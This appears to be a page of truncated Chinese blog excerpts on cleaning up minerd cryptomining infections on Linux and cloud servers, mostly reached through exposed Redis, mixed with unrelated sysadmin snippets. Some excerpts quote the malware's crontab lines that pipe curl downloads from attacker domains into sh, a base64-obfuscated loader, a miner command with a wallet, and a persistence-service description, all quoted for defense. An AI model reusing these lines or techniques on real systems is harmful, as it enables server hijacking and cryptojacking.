上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务. 找不到始作俑者,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程 1. 关闭访问挖矿服务器的访…

前几天,公司两台linux服务器,一台访问速度很慢,cpu跑满,一台免密码登录失效,公钥文件被改写成redis的key.用htop命令查询发现了minerd木马进程,初步猜测是redis没有配访问权限造成的.网上查询minerd木马,发现这是一个很常见的挖矿程序,相关猜测也得到了验证. 下文是网上搜索到的清除minerd木马方法. 现状描述 1.top可以看到,这个minerd 程序把cpu跑满了 2.ps aux | grep minerd 可知是这个程序: /opt/minerd 这个不是我…

cd /opt chmod -x minerd 去/root/.ssh 目录下,清除authorized_keys,KHK75NEOiq 文件 在ssh的配置文件/etc/ssh/sshd_config中也可以看到把AuthorizedKeysFile指向了这个文件了(.ssh/KHK75NEOiq) .crontab上的命令删除掉 "*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spo…

阿里云kubernetes被minerd挖矿入侵 # kubectl get rc mysql1 -o yaml apiVersion: v1 kind: ReplicationController metadata: creationTimestamp: 2017-09-07T07:21:43Z generation: 1 labels: app: mysql1 name: mysql1 namespace: default resourceVersion: "12180788" s…

云服务器 ECS Linux 异常进程 minerd 导致系统 CPU 跑满 问题现象 云服务器 ECS Linux 服务器 CPU 跑满,或者使用服务器越来越慢. 问题原因 使用 top 命令看到有一个 minerd  异常进程,占用了大量 CPU 资源.如下图所示: 经定位,该进程是一个挖矿程序,一般存在  /tmp/minerd 目录下.如果使用 top 查看不到,用 ps 命令可以找到相关进程.比如: 服务器存在这个进程,如果不是主动开启的,则很可能是被入侵所致.服务器变成了别人的矿机,…

发现顽固minerd 进程与ntp一起启动,所以一起杀掉 yum remove ntp kill -9 `ps -ef | grep ntp|awk '{print $2}'` kill -9 `ps -ef | grep minerd|awk '{print $2}'`…

突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: root 386m S : /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT root 3448m 292m 14m S :02.07 /usr/java/default/bin/java -Xm…

top -c把cpu占用最多的进程找出来: Tasks: total, running, sleeping, stopped, zombie Cpu(s): 72.2%us, 5.9%sy, 0.0%ni, 17.5%id, 0.0%wa, 0.0%hi, 0.1%si, 4.3%st Mem: 16330820k total, 4093308k used, 12237512k free, 339564k buffers Swap: 0k total, 0k used, 0k free, 112…

记录一次服务器被入侵的解决方法 一:问题说明 1.我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况(top 命令),看到一个名为minerd的进程占用了99.5%的CPU  2.minerd是个挖矿程序,什么是“挖矿”,特此百度了一下, 所谓“挖矿”实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性.比特币网络会自动调整数学问题的难度,让整个网络约每10分钟得到一个合格答案.随后比特币网络会新生成一定量的比特币作为赏金…

:top TASKKILL /F /IM "minerd.exe" Goto top and then searching the file system for minerd.exe. Next, search Windows Registry for any reference to minerd.exe or the file location of that executable. Chances are good that if you had AV running on i…

redis 清除minerd进程的方法 1 修改redis配置文件 //禁止高危命令rename-command FLUSHALL ""rename-command CONFIG ""rename-command EVAL ""mypassword设置成自己的密码 采用密码登录requirepass mypassword只能本地连接redisbind 127.0.0.1 2 先去crontab -e 清除不是你的 定时器计划然后 top 找倒mi…

redis的漏洞让公司的服务器中了挖矿的病毒,入侵者在服务器上留了后门.每次只是把进程杀杀,但是过段时间病毒又回来了,这个事情一直让人头疼.先是minerd的病毒入侵,后是minergate-cli入侵.当时以为是服务器的帐号密码被泄漏了,然后对服务器登录的ip一个个检查,对操作的shell一个个核对,都没有发现异常.这就奇怪了,不知道什么原因让病毒一直入侵.还是minergate-cli这个病毒的运行方式让我找到了问题的所在.以往的miner进程会让cpu跑到1000%的状态,kill的时候只…

现在比特币的价格涨得很高,所以现在有黑客专门制造挖矿木马来诱导网友,从而达到控制电脑上的显卡来挖掘比特币.为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高.如果你是一位 3D 游戏玩家,正好中了比特币挖矿木马,就会发现在玩游戏时会非常卡顿. 那么,跟我们今天提到的挖矿minerd进程又有何关系呢? 发现问题 最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下: 让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu…

scp -P202 xx3.x6.xx.xx:/usr/local/zookeeper-.zip /tmp #指定远程服务器的端口和远程服务器的目标文件 ,最后指定要下载到本的地目录 也可以从远程服务器上把整个目录下载下来: scp -P3332 -r xx2.x2.1xxx.x4:/apps/tengine ./ #把远程服务器上的tengine目录下载到本地当前目录里 注意:如果远程主机的目标目录有同名的文件会被强制覆盖!!! # scp -P22022 11.92.189.44:/home…

linux 中如何通过命令名称查询出进程的id呢? 例如,我想查询java的进程id: ps -ef |grep java |grep -v grep|awk '{print $2}' 或者: ps -ef |grep java |grep -v grep| cut -d " " -f 7 说明: (1)awk 默认以空格分隔,可以通过-F 指定分隔符; (2)grep -v表示排除 更多例子: ps -ef |grep "/usr/bin/acpid" |grep…

莱特币ltc在linux下的多种挖矿方案详解 4.0.1 Nvidia显卡Linux驱动Nvidia全部驱动:http://www.nvidia.cn/Download/index.aspx?lang=cnNvidia GeForce®驱动:http://www.geforce.cn/driversNVidia CUDA http://developer.nvidia.com/cuda/cuda-downloads http://developer.nvidia.com/cuda/cuda-to…

挖矿一般都要用高端显卡做矿机, 不是一般人玩得起 这里讲的是一种用CPU来挖矿的方法, 纯玩玩, 不要指望能致富喔 本方法在CentOS和树莓派原生系统上测试通过 先从git下载cpuminer git clone https://github.com/pooler/cpuminer.git​ 进入目录 cd cpuminer/​ 执行 ./autogen.sh ​ 执行 ./configure CFLAGS="-mfpu=neon"​ 注: 上面是在树莓派中编译的参数, 如果在Cen…

#!/bin/bash exec &>/dev/null {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg oUkFORE9NICUgNjAwKSkKKHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSBy…

转自:https://blog.csdn.net/hgx13467479678/article/details/82347473 1,cpu 100%, 用top 查看cpu100 2,删掉此进程 cpu还是 100% 3,估计是进程被隐藏了 4,定时任务多了一个执行任务 5:打开连接 https://pastebin.com/raw/xbY7p5Tb 获取如下内容 6:打开 https://pastebin.com/raw/uuYVPLXd  ,发现是一个Base64编码字符串, 7:用Bas…

问题1 kubernetes pod启动报错open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory 解决方法执行命令安装软件 yum install *rhsm* 问题2 阿里云专有网络部署kubernetes集群,node分别在两个阿里云ECS,通过公网ip连通,但kube ui控制台监测不到node 修改/etc/kubernetes/kubelet,将主机名设置…

http://orchome.com/5https://www.cnblogs.com/haozhengfei/p/2192231596ceb2ac4c22294dbd25a1ca.htmlhttps://segmentfault.com/a/1190000009769143http://blog.csdn.net/yue7603835/article/details/43245705https://github.com/yenchenlin/DeepLearningFlappyBirdhttp…

1.下载软件: cpuminer: http://sourceforge.net/projects/cpuminer/files/ 找到对应的版本,我的服务器是centos64的,找了个当前最高版本:http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz/download mining_proxy: 项目主页:https://github.com/slush0/stratum…

服务器出现异常,完全无法访问,ssh登陆都极其缓慢 解决过程 top 查看系统状态,发现 load average 平均负载值非常高,再看排名第一的进程,是一个不认识的进程名:minerd 感觉是被入侵了,上网搜了下minerd是什么东西,是个挖矿程序,看来的确被入侵了,被抓来当矿工了 查看进程信息 ps -ef | grep minerd 是tmp下的一个文件 马上执行 kill 杀掉这个进程,并删除对应文件 再次 top 命令查看,资源占用恢复正常 因为木马有自我改名.自我复制.自动运行的能…

1. crontab的方式 2. 服务的方式.该服务能够持续监测minerd是否在运行,如果没有在运行就会运行minerd:服务也可以做成开机自启动.该服务执行的内容如下,该服务是判断目标服务器的path环境变量配置的目录是否有minerd,如果存在则不处理,如果不存在可以将其他文件夹下的minerd复制到该目录下,然后判断minerd程序是否在执行,如果没有执行则运行挖矿程序: # -*- coding=utf8 -*-import osimport commandsif(os.path.ex…

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由腾讯云数据库 TencentDB发表于云+社区专栏 9月10日下午,又一起规模化利用Redis未授权访问漏洞攻击数据库的事件发生,此次黑客以勒索钱财作为目的,猖狂至极,甚至直接删除数据库数据.由于腾讯云早在17年就发现过Redis这个漏洞,有个预案,所以这一次更是第一时间启动全网通知提醒,周知腾讯云用户进行防范,同时给出防范和应对措施. [漏洞概述] Redis 默认情况下,会绑定在 0.0.0.0:6379,导致Redis服务暴…

htop 发现导常: 接着发现可疑进程: 首先检测crontab,发现问题: # crontab -l */ * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh 注释掉计划任务!!! # crontab -l #*/ * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh 把把脚本下载下来: http://www.bdyutiudwj.com/i.sh?1 查看一下内容: ex…

教程:Linux 技巧:让进程在后台可靠运行的几种方法 网上搜索了一下,方法很多,选用最流行的 screen 命令参考:http://man.linuxde.net/screen 1. 安装 root@xkfx:~# apt install screen ... root@xkfx:~# screen -list 列出所有会话 There is a screen on: .pts-.xkfx (// :: PM) (Attached) Socket in /var/run/screen/S-ro…

服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里云主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? 第一反应是去看看开启启动和crontab 果然是修改了crontab,不过病毒应该是很多地方都有,修改后过几分钟还有. 随…

点进来的基本都是遇到liunx变矿机的小伙伴吧(cpu运载300%) 卡的连终端都很难打开 开下来之后提示 大意是, 到xxx网站给钱了事, 不过基本这个网站基本也上不去, 要么是暴力破解, 要么是通过 redis 6379端口 详情了解redis安全漏洞 遇到这种问题毫无疑问: 先要把突然出现的乱七八糟的占cpu过高的进程kill -stop pid 暂停掉, 不要尝试直接kill -9 pid cd /etc/cron 查看定时任务 如果在/var/spool/cron这里面也看下 非法的定…

Github上的1000多本免费电子书重磅来袭!   以前 StackOverFlow 也给出了一个免费电子书列表,现在在Github上可以看到时刻保持更新的列表了. 瞥一眼下面的书籍分类目录,你就能知道这个免费电子书库的含金量了吧.记得一定要看几本,千万别下载了大量书籍而束之高阁! 行动重于空想! Github地址:     https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md I…